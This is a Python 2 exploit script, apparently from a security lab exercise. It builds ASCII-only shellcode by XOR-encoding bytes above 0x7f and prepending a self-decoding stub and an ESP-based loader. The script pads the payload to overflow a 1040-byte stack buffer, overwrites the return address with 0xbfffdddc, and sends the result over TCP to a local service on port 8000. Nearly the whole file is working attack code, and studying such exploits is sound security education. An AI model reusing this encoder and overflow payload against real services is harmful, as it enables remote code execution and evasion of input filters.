  32. #!/usr/bin/python
  33.  
  34. import functools, os, socket, traceback, assemble, struct
  35. import q2
  36.  
  37.  
HOST        = '127.0.0.1'   # address main() connects to (loopback: the lab service on this machine)
SERVER_PORT = 8000          # TCP port main() connects to
LOCAL_PORT  = 1337          # not referenced anywhere in this file
  41.  
  42.  
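ASCII_MAX = 0x7f  # largest ord() value warn_invalid_ascii accepts without complaint


def warn_invalid_ascii(selector=None):
    """Decorator factory: report non-ASCII characters in a function's result.

    Args:
        selector: optional callable applied to the wrapped function's return
            value to pick the part that must be ASCII-only (e.g. one element
            of a returned tuple, or a slice). Defaults to the identity.

    Returns:
        A decorator. The wrapped function is called normally; for every
        character of ``selector(ret)`` whose ``ord`` exceeds ``ASCII_MAX`` a
        line ``"<ord> at position <1-based index>"`` is printed, followed by a
        single WARNING carrying the call stack when at least one was found.
        The original return value is passed through unchanged.
    """
    selector = selector or (lambda x: x)

    def decorator(func):
        @functools.wraps(func)
        def result(*args, **kwargs):
            ret = func(*args, **kwargs)
            # Walk the selected part once. The original walked it twice (a
            # report loop and an any()), which would miss everything if the
            # selector returned a one-shot iterator.
            offenders = [
                (pos, ord(c))
                for pos, c in enumerate(selector(ret), start=1)
                if ord(c) > ASCII_MAX
            ]
            for pos, code in offenders:
                print(str(code) + " at position " + str(pos))
            if offenders:
                print('WARNING: Non ASCII chars in return value from %s at\n%s'
                      % (func.__name__, ''.join(traceback.format_stack()[:-1])))
            return ret
        return result
    return decorator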
  63.  
  64.  
def get_raw_shellcode():
    """Return the unencoded shellcode supplied by the ``q2`` module."""
    raw = q2.get_shellcode()
    return raw
  67.  
  68.  
@warn_invalid_ascii(lambda pair: pair[0])
def encode(data):
    """XOR every byte above 0x7f with 0xff and record where that happened.

    Args:
        data: the raw shellcode as a string (this file uses Python 2 ``str``
            semantics: ``ord``/``chr`` on one-character strings).

    Returns:
        A ``(encoded, indices)`` tuple. ``encoded`` is ``data`` with each byte
        greater than 0x7f replaced by ``byte ^ 0xff``; ``indices`` lists the
        offsets that were changed, in ascending order. The decorator's
        selector checks only ``encoded``.
    """
    out = []
    indices = []
    for offset, ch in enumerate(data):
        value = ord(ch)
        if value > 0x7f:
            indices.append(offset)
            ch = chr(value ^ 0xff)
        out.append(ch)
    return "".join(out), indices
  81.  
  82.  
@warn_invalid_ascii()
def get_decoder(indices):
    """Build the run-time decoder stub that reverses ``encode``.

    Args:
        indices: ascending offsets (relative to EAX) of the bytes that
            ``encode`` XOR'd with 0xff.

    Returns:
        Machine code (string) that sets BL to 0xff and then, for each offset,
        emits ``XOR byte ptr [EAX+disp], BL``. Whenever the displacement to
        the next offset would exceed 127, a hand-assembled ``ADD EAX, 127``
        is emitted first and the running base advanced by 127 — presumably
        so the displacement byte itself stays within the ASCII range.
    """
    # BL = 0xff, built from instructions whose encoding stays under the
    # ASCII opcode boundary (the original author's note).
    parts = [assemble.assemble_data("PUSH 0 ;POP EBX ;DEC EBX ;")]

    # Hand-assembled 'ADD EAX, 127 ;' (the original forced this opcode by hand).
    add_127_command = '\x05\x7f\x00\x00\x00'

    base = 0  # how far EAX has already been advanced
    for offset in indices:
        while offset - base > 127:
            base += 127
            parts.append(add_127_command)
        parts.append(assemble.assemble_data(
            "XOR byte ptr [EAX+" + str(offset - base) + "], BL; "))
    return ''.join(parts)
  102.  
  103.  
  104.  
  105.  
@warn_invalid_ascii()
def get_shellcode():
    """Return the complete ASCII-checked shellcode: EAX loader + decoder + body.

    Returns:
        ``loader + decoder + encoded``: ``loader`` copies ESP into EAX and
        walks it back by ``len(raw) + 4`` single ``DEC EAX`` steps (intended
        to land EAX on the encoded body, which the decoder indexes from EAX),
        ``decoder`` is ``get_decoder`` for the flipped offsets, and
        ``encoded`` is the output of ``encode``.
    """
    raw = get_raw_shellcode()
    encoded, flipped = encode(raw)
    decoder = get_decoder(flipped)
    # +4: the caller's return address has already been popped, so ESP is
    # 4 bytes past where the author expects it. The long DEC EAX chain is the
    # original author's admitted shortcut for lack of an ASCII-encodable
    # subtract instruction.
    loader_asm = "PUSH ESP ;POP EAX ;" + " DEC EAX ;" * (len(raw) + 4)
    loader = assemble.assemble_data(loader_asm)
    return loader + decoder + encoded
  117.  
  118.  
@warn_invalid_ascii(lambda x: x[4:-5])
def get_payload():
    """Build the message main() sends: 4-byte big-endian length, then the body.

    The body is the shellcode left-padded with 0x41 bytes to 1040 bytes,
    followed by the 4-byte little-endian return address 0xbfffdddc. The
    decorator's selector skips the 4-byte length prefix and the last five
    bytes (the return address plus one byte of the padded body), so only that
    middle part is ASCII-checked.

    ``str.rjust`` never truncates: a shellcode longer than 1040 bytes yields a
    longer body without any error. NOTE(review): on x86 the pad byte 0x41
    decodes as ``INC ECX``, not ``INC EAX`` as the original comment assumed.

    Returns:
        The length-prefixed message string.
    """
    shellcode = get_shellcode()
    # little=False selects '<I' in network_order_uint32: little-endian address.
    return_address = network_order_uint32(0xbfffdddc, False)
    # 0x90 (NOP) is outside the ASCII range, so the slack is filled with 0x41.
    body = shellcode.rjust(1040, '\x41') + return_address
    # little=True selects '>L' in network_order_uint32: big-endian length.
    return network_order_uint32(len(body), True) + body
  129.  
  130.  
def network_order_uint32(value, little):
    """Pack ``value`` as 4 bytes; note the ``little`` flag is inverted from its name.

    Args:
        value: unsigned 32-bit integer; ``struct.error`` outside 0..2**32-1.
        little: despite the name, ``True`` selects ``'>L'`` (big-endian,
            i.e. network order) and ``False`` selects ``'<I'`` (little-endian).
            Both callers in this file rely on that mapping, so it is kept.

    Returns:
        The 4-byte packed string.
    """
    layout = '>L' if little else '<I'
    return struct.pack(layout, value)
  136.  
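def main():
    """Connect to HOST:SERVER_PORT and send the message built by get_payload().

    The socket is closed on every path. The original ran ``connect()`` before
    the ``try``, so a failed connection (refused, timeout) left the socket
    open; moving it inside the ``try`` lets the ``finally`` release it too.
    """
    payload = get_payload()
    conn = socket.socket()
    try:
        conn.connect((HOST, SERVER_PORT))
        conn.sendall(payload)
    finally:
        conn.close()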
  145.  
  146.  
# Script entry point: build the message and send it to HOST:SERVER_PORT.
if __name__ == '__main__':
    main()
  149. q3.py